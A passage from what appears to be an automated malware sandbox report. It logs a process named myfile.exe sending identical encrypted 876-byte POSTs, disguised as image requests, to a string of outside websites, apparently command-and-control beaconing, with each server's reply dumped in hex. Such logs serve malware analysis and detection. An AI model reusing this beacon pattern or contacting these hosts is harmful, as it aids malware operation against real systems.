                                                              2024-09-09 10:07:31 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:31 UTC143INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:31 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              2024-09-09 10:07:31 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              21192.168.2.44975952.215.137.2004437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:32 UTC271OUTPOST /admin/game/gatm.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: georgemuncey.com
                                                              2024-09-09 10:07:32 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:33 UTC757INHTTP/1.1 301 Moved Permanently
                                                              Server: openresty/1.15.8.3
                                                              Date: Mon, 09 Sep 2024 10:07:32 GMT
                                                              Content-Length: 0
                                                              Connection: close
                                                              Location: https://www.georgemuncey.com/admin/game/gatm.jpg
                                                              Set-Cookie: TiPMix=68.75653079247495; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None
                                                              Set-Cookie: x-ms-routing-name=self; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None
                                                              Strict-Transport-Security: max-age=2592000
                                                              Request-Context: appId=cid-v1:64640e46-9cd2-4413-9485-c7395dd99be8
                                                              x-azure-ref: 20240909T100732Z-18486d4796dnz25jm2wgzasxzg00000002y000000000am6q
                                                              X-Cache: CONFIG_NOCACHE
                                                              Strict-Transport-Security: max-age=63072000; includeSubDomains; preload


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              22192.168.2.44976052.215.137.2004437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:33 UTC213OUTGET /admin/game/gatm.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: www.georgemuncey.com
                                                              2024-09-09 10:07:34 UTC717INHTTP/1.1 404 Not Found
                                                              Server: openresty/1.15.8.3
                                                              Date: Mon, 09 Sep 2024 10:07:34 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Cache-Control: no-store,no-cache
                                                              Pragma: no-cache
                                                              Set-Cookie: TiPMix=77.60889268289033; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None
                                                              Set-Cookie: x-ms-routing-name=self; path=/; HttpOnly; Domain=fabrik-hosted-ne.azurewebsites.net; Max-Age=3600; Secure; SameSite=None
                                                              Strict-Transport-Security: max-age=2592000
                                                              Request-Context: appId=cid-v1:64640e46-9cd2-4413-9485-c7395dd99be8
                                                              x-azure-ref: 20240909T100733Z-15855465dc7b6hwv4tcxcnnqr00000000r1g000000005u3b
                                                              X-Cache: CONFIG_NOCACHE
                                                              2024-09-09 10:07:34 UTC9121INData Raw: 32 33 39 34 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 73 74 61 6e 64 61 72 64 2d 66 6f 6e 74 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 65 6f 72 67 65 6d 75 6e 63 65 79 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 66 61 62 72 69 6b 2e 69 6f 22 20 2f 3e 0d 0a 20 20 20
                                                              Data Ascii: 2394<!DOCTYPE html><html class="no-js standard-fonts" lang="en-GB"> <head prefix="og: http://ogp.me/ns#"> <link rel="preconnect" href="https://www.georgemuncey.com"> <link rel="preconnect" href="//static.fabrik.io" />


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              23192.168.2.44976185.92.72.564437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:35 UTC276OUTPOST /static/pictures/qbadcqiwyz.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: nbva.co.uk
                                                              2024-09-09 10:07:35 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:36 UTC594INHTTP/1.1 503 Service Unavailable
                                                              Connection: close
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              link: <https://nbva.co.uk/wp-json/>; rel="https://api.w.org/"
                                                              x-litespeed-tag: 799_HTTP.404,799_HTTP.503
                                                              x-litespeed-cache-control: no-cache
                                                              transfer-encoding: chunked
                                                              date: Mon, 09 Sep 2024 10:07:36 GMT
                                                              server: LiteSpeed
                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              2024-09-09 10:07:36 UTC774INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 6c 65 66 74 20 68 74 6d 6c 5f 6d 61 69 6e 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 73 6c 69 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 62 61 72 5f 61 63 74 69 76 65 20 68 74 6d
                                                              Data Ascii: 10000<!DOCTYPE html><html lang="en-GB" class="html_stretched responsive av-preloader-disabled html_header_top html_logo_left html_main_nav_header html_menu_right html_slim html_header_sticky html_header_shrinking_disabled html_header_topbar_active htm


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              24192.168.2.44976223.236.62.1474437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:37 UTC274OUTPOST /content/pictures/efwjwa.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: c-sprop.com
                                                              2024-09-09 10:07:37 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:37 UTC350INHTTP/1.1 403 Forbidden
                                                              Date: Mon, 09 Sep 2024 10:07:37 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              X-Seen-By: T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLho2HUitPUf9N0/utZJ1PDYm++C2XkuTvnlRFg2XiSDL
                                                              Server: Pepyaka
                                                              X-Wix-Request-Id: 1725876457.2921179646686126538
                                                              X-Content-Type-Options: nosniff
                                                              2024-09-09 10:07:37 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              25192.168.2.44976385.10.140.714437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:38 UTC277OUTPOST /data/assets/vdtrmjnm.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: relevantonline.eu
                                                              2024-09-09 10:07:38 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:38 UTC391INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Sep 2024 10:07:38 GMT
                                                              Server: Apache/2
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://relevantonline.eu/wp-json/>; rel="https://api.w.org/"
                                                              Upgrade: h2,h2c
                                                              Connection: Upgrade, close
                                                              Vary: Accept-Encoding,User-Agent
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              2024-09-09 10:07:38 UTC7801INData Raw: 32 30 30 30 0d 0a 20 20 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 66 6f 72 20 57 6f 72 64 50
                                                              Data Ascii: 2000 <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" /><meta name='robots' content='noindex, follow' />... Google Tag Manager for WordP
                                                              2024-09-09 10:07:38 UTC397INData Raw: 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70
                                                              Data Ascii: gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp
                                                              2024-09-09 10:07:38 UTC2INData Raw: 0d 0a
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              26192.168.2.449764188.246.227.294437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:39 UTC264OUTPOST /news/temp/md.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: abulanov.com
                                                              2024-09-09 10:07:39 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:39 UTC150INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.23.2
                                                              Date: Mon, 09 Sep 2024 10:07:39 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 153
                                                              Connection: close
                                                              2024-09-09 10:07:39 UTC153INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.23.2</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              27192.168.2.449765185.68.16.214437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:40 UTC279OUTPOST /wp-content/graphic/wrza.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: maxcube24.com.ua
                                                              2024-09-09 10:07:40 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:41 UTC546INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:41 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://www.maxcube24.com.ua/wp-json/>; rel="https://api.w.org/"
                                                              Set-Cookie: PHPSESSID=q0okjhjaa24blp8vp04qd91mr0; path=/
                                                              Set-Cookie: qtrans_front_language=ru; expires=Tue, 09-Sep-2025 10:07:41 GMT; path=/
                                                              x-ray: wnp48936:0.740/wn48936:0.750/wa48936:D=744868
                                                              2024-09-09 10:07:41 UTC13INData Raw: 33 0d 0a 34 30 34 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 34040


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              28192.168.2.449766188.114.96.34437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:42 UTC282OUTPOST /uploads/pictures/gcgicdxmun.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: kenmccallum.com
